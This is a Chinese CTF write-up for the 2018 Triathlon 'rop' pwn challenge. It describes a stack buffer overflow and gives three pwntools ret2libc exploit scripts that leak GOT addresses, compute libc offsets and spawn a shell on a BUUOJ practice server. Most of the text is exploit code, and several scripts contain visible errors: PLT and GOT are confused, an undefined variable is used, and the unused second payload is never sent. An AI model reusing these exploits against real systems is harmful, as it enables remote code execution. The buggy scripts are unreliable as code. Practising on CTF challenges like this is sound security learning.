首页/资讯中心/详情

PWN手的成长之路-18_铁人三项(第五赛区)_2018_rop

PWN手的成长之路-18_铁人三项(第五赛区)_2018_rop
📅 发布时间:2026/6/20 10:37:51

image

file,checksec:
image

image

buf只有0x88字节大小,但read却可以往buf中输入0x100字节,使所以存在栈溢出。
image
且字符串中无/bin/sh,函数中无 system 函数,所以可以确定是ret2libc。

exp,这个exp可以泄露出write的地址:

from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',25899)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.got['write']
main_addr = elf.sym['main']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(0xD)
r.sendline(payload)write_real_addr = u32(r.recv(4))
print(hex(write_real_addr))#libc
libc = LibcSearcher('write',write_real_addr)
base_addr = write_real_addr - libc.dump('write')
binsh_addr = base_addr + libc.dump('str_bin_sh')
system_addr = base_addr + libc.dump('system')#attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(main_addr) +p32(binsh_addr)
r.sendline(payload)
r.interactive()

image

exp2(这个exp泄露的是read的地址):

from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',28419)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']
read_got = elf.got['read']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)
r.sendline(payload)read_real_addr = u32(r.recv(4))
print(hex(read_real_addr))#libc
libc = LibcSearcher('write',write_real_addr)
base_addr = write_real_addr - libc.dump('write')
binsh_addr = base_addr + libc.dump('str_bin_sh')
system_addr = base_addr + libc.dump('system')
# base_addr = write_real_addr - 0x0e56f0        #libc.dump('write')
# binsh_addr = base_addr + 0x17b8cf             #libc.dump('str_bin_sh')
# system_addr = base_addr + 0x03cd10           #libc.dump('system')
#binsh_addr = 0x961df#attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(0) +p32(binsh_addr)
r.sendline(payload)
r.interactive()

image

使用这两个地址的后三位,在 libc.blukat.me 网址中即可计算得到偏移。
image

之后编写总的exp:

from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',28419)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']
read_got = elf.got['read']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)
r.sendline(payload)read_real_addr = u32(r.recv(4))
print(hex(read_real_addr))#libc
base_addr = read_real_addr - 0x0e5620        
binsh_addr = base_addr + 0x17b8cf            
system_addr = base_addr + 0x03cd10         #attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(1) +p32(binsh_addr)
r.sendline(payload2)
r.interactive()

因为在libcsearcher中并没有找到匹配的libc,所以用了这种计算的方法得到了flag。